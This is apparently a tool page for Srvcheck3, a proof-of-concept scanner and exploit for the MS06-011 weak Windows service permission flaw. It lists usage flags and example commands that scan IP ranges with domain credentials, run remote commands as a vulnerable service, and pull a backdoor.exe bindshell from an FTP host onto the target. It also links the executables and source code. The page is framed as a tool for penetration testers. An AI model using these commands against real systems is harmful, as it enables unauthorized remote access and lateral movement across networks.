Introduction
Srvcheck is a proof of concept for the
MS06-011. This tool scans your network for weak service DACLs and enumerates
vulnerable services.
Due to the fact that those permissive dacls allows remote authenticate users to
modify the command that is executed, srvcheck deploys an vbs payload that will execute
a bindshell.

At this time, several products are affected for this vulnerability so once you get
a valid domain user, srvcheck allows you to get access into several systems.
Details
The public version, srvcheck2 was improved. The new payload deployed with srvcheck3
works tranfering files by ftp, and allows faster network scanning.
Usage Information:
Srvcheck 3 - Windows Services ACL permission Scanner
(c) 2006 - 2008 Andres Tarasco - [email protected]
* PRIVATE BUILD for PENTESTERS - http://www.tarasco.org
Available parameters for SrvCheck3:
-----------------------------------
Srvcheck3.exe -l [options] List vulnerable services (locally or remotely)
-H Host|[ip1-ip2] Specify a remote host/s to connect (netbiosname/ip(s))
-f file Specify a ip/host file to audit (for example net view >file.txt)
Srvcheck3.exe -m service -c command Executes a remote command running as service
Srvcheck3.exe -m service [options] Executes backdoor or command for that service
-r ftphost ftpport backdoorfile Download configuration)
[-o optionalparameter] Additional parameter to be added to backdoorfile
You should also use always -u DOMAIN\user and -p password flags unless running from
a domain shell
examples:
----------
Srvcheck3.exe -l (list local vulnerabilities)
Srvcheck3.exe -l -H 192.168.1.1-192.168.1.255 -u domainuser -p domainpass
Srvcheck3.exe -l -f hosts.txt -u DOMAINuser -p password (list remote vulnerabilities)
Srvcheck3.exe -m service -H host -c "cmd.exe /c md c:\PWNED"
Srvcheck3.exe -m vulnservice -H 192.168.1.200 -u domainuser -p domainpass -r 192.168.1.1
21 backdoor.exe (exe
cutes backdoor.exe bindshell)
There is an paper that i published time ago about MS06-011 (spanish). You can download
it
here
You can also browse online the
source code.
Download srvcheck2 (Windows executable + Source code)
Download srvcheck3 (Windows executable + Source code)